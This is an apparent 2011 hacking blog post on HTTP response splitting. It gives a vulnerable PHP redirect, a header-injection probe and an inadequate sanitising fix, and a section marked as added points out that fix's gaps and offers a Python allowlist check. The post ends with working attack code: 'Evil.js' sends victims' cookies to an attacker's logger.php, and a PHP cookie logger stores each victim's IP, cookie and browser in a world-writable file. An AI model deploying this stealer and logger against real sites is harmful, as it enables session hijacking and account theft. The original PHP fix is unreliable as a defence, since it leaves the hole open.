Thursday, March 3, 2011

HTTP Response Splitting

HRS, although not common practice among the hacking community and something of a taboo subject, is one of the more popular techniques and carries some of the most dangerous capabilities of Cross-Site Scripting. With it you can modify or create your own headers to do any of the following: redirect, spoof request data (POST or GET), spoof the User-Agent, spoof the Referer, change your IP, change the information on a web page, or replace a web page with only the text you specify. You can even use it to brute-force a website, although you would need to write a script yourself to loop over the request variable.

An example of an HRS vulnerable script would be the following:

<?php header("Location: " . $_GET['url']); ?>

This is what is most commonly exploited in HRS: the Location header. Most sites (the ones that want hits and popularity) would rather have outbound links pass through their own site so that it shows up in the Referer, mostly for popularity, hits, advertising, etc.
The worst part about this script is that its input is unsanitized, so you can easily modify the header to do whatever you want. An easy way to check whether it is vulnerable is to place the following in the ?url= variable:

%0AContent-Type: text/html%0AContent-Length: 13%0A%0AKr3w was here

%0A is the URL-encoded value of \n, the newline character. This will replace all the text on the web page with "Kr3w was here".

The possibilities of what a hacker can do with this are seemingly endless. A way to fix this is to strip the % characters and newlines from the value before it reaches the header:

<?php
$loc = $_GET['url'];
$loc = str_ireplace("%", "", $loc);    // drop any remaining URL-encoding characters
$loc = str_ireplace("\n", "", $loc);   // drop real newlines
$loc = str_ireplace("\\n", "", $loc);  // drop the literal two-character sequence \n
header("Location: " . $loc);
?>
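Two caveats on that fix are worth knowing as a defender. PHP has already URL-decoded $_GET by the time the script runs, so the %0A in the probe above arrives as a real newline and the "%" replacement never sees it; and the script removes \n but not \r, which also ends a header line. (PHP itself has refused header() values containing newlines since 5.1.2, which is why this exact probe no longer works on maintained installs.) The added example below is not from the original post; it is written in Python rather than PHP so it runs stand-alone, and it shows the check that actually closes the hole: reject any value containing a line break before the header is built, and only redirect to an absolute http(s) URL whose host is on an allowlist. The allowed host "example.com" and the sample URLs are constructed for the demonstration.

```python
from typing import Iterable, Optional
from urllib.parse import unquote, urlsplit

# Constructed sample inputs. PROBE is the blog post's own test string as a
# web server hands it to the script: already URL-decoded, so %0A is a real "\n".
BENIGN = "https://example.com/page?x=1"
PROBE = unquote("%0AContent-Type: text/html%0AContent-Length: 13%0A%0AKr3w was here")


def contains_header_break(value: str) -> bool:
    """True if the value could terminate a header line: CR, LF or NUL."""
    return any(ch in value for ch in ("\r", "\n", "\x00"))


def strip_percent_and_backslash_n(value: str) -> str:
    """The blog's fix, reproduced for comparison: remove '%', '\\n' and literal backslash-n."""
    return value.replace("%", "").replace("\n", "").replace("\\n", "")


def safe_redirect_target(raw: str, allowed_hosts: Iterable[str]) -> Optional[str]:
    """Return raw unchanged only if it is a clean absolute http(s) URL on an allowed host.

    Returns None for anything that should not be placed in a Location header.
    """
    # Check the raw string first: urlsplit() silently strips tab, CR and LF,
    # so parsing before this check would hide the injection.
    if contains_header_break(raw):
        return None
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https"):
        return None            # rejects "javascript:", "//host" and relative paths
    host = (parts.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        return None            # hostname ignores "user@" tricks, so example.com@evil is rejected
    return raw


def location_header(raw: str, allowed_hosts: Iterable[str]) -> Optional[str]:
    """Build the full header line, or None if the redirect must be refused."""
    target = safe_redirect_target(raw, allowed_hosts)
    return None if target is None else "Location: " + target


if __name__ == "__main__":
    for sample in (BENIGN, PROBE, "https://example.com@evil.example/", "/local"):
        print(repr(sample)[:40], "->", location_header(sample, ["example.com"]))
```

The "\r" case is the one the blog's str_ireplace chain misses: strip_percent_and_backslash_n("\rSet-Cookie: a=b") still contains a carriage return, while contains_header_break catches it. When a value is refused, the right response is a fixed local landing page, not an attempt to "clean" the attacker's string.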

Scripts and syntax for Log.php and Evil.js:

-Evil.js
document.location = "http://yoursite.com/logger.php?cookie=" + document.cookie + "&redirect=http://theirsite.com/diff_page.php";


-Log.php
<?php
/* ** Kr3w's Cookie Logger ** */
$ip       = $_SERVER['REMOTE_ADDR'];
$cookie   = $_GET['cookie'];
$referer  = $_SERVER['HTTP_REFERER'];
$browser  = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];
$data = "IP: " . $ip . "\n"
      . "Cookie: " . $cookie . "\n"
      . "Referrer: " . $referer . "\n"
      . "Browser: " . $browser . "\n\n";
$log = "cookies.txt";
@chmod($log, 0777);
$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);
@header("Location: $redirect");
?>
